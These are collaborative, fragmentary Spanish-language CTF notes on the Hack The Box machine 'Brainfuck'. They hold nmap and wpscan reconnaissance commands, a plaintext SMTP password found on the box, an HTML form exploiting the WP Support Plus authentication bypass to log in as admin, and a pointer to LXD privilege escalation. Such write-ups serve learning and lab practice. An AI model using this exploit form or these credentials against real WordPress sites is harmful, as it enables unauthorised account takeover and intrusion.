# BRAINFUCK
[TOC]
## RECON
Carlos:
`nmap -p- -sS --min-rate 5000 -Pn -n -vvv --open 10.10.10.17 -oG ports.gp`
`cat ports.gp | grep -o "[0-9]*/open/tcp" | cut -d "/" -f1 | tr "\n" ","`
`sudo nmap -p22,25,110,143,443 -sV -sC --min-rate 5000 -Pn -n -vvv 10.10.10.17 -oN ports_recon.txt`
admin
orestis@brainfuck.htb
Marc:
PUERTO 443
```
webs : https://brainfuck.htb/
https://sup3rs3cr3t.brainfuck.htb/
```
```
whatweb https://brainfuck.htb/
https://brainfuck.htb/ [200 OK] Bootstrap[4.7.3], Country[RESERVED][ZZ], Email[ajax-loader@2x.gif,orestis@brainfuck.htb], HTML5, HTTPServer[Ubuntu Linux][nginx/1.10.0 (Ubuntu)], IP[10.10.10.17], JQuery[1.12.4], MetaGenerator[WordPress 4.7.3], Modernizr, PoweredBy[WordPress,], Script[text/javascript], Title[Brainfuck Ltd. – Just another WordPress site], UncommonHeaders[link], WordPress[4.7.3], nginx[1.10.0]
```
```
INFO:
SMTP:
orestis
kHGuERB29DNiNE
```
Sergio:
## Explotacion
Carlos:
Marc:
Wordpress
```
wpscan --disable-tls-checks --url https://brainfuck.htb/ -e ap,u,dbe --api-token <vuestra api de wpscan>
```
```
version: 4.7.3
plugins interesantes:
- WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution (RCE)
```
```
https://www.exploit-db.com/exploits/41006
<form method="post" action="https://brainfuck.htb/wp-admin/admin-ajax.php">
Username: <input type="text" name="username" value="administrator">
<input type="hidden" name="email" value="sth">
<input type="hidden" name="action" value="loginGuestFacebook">
<input type="submit" value="Login">
</form>
```
```
python3 -m http.server
username=admin
refresh al wordpress
```
Sergio:
## Post-Explotacion
Carlos:
https://www.hackingarticles.in/lxd-privilege-escalation/
Marc:
Sergio:
Sign in with Wallet
Connect another wallet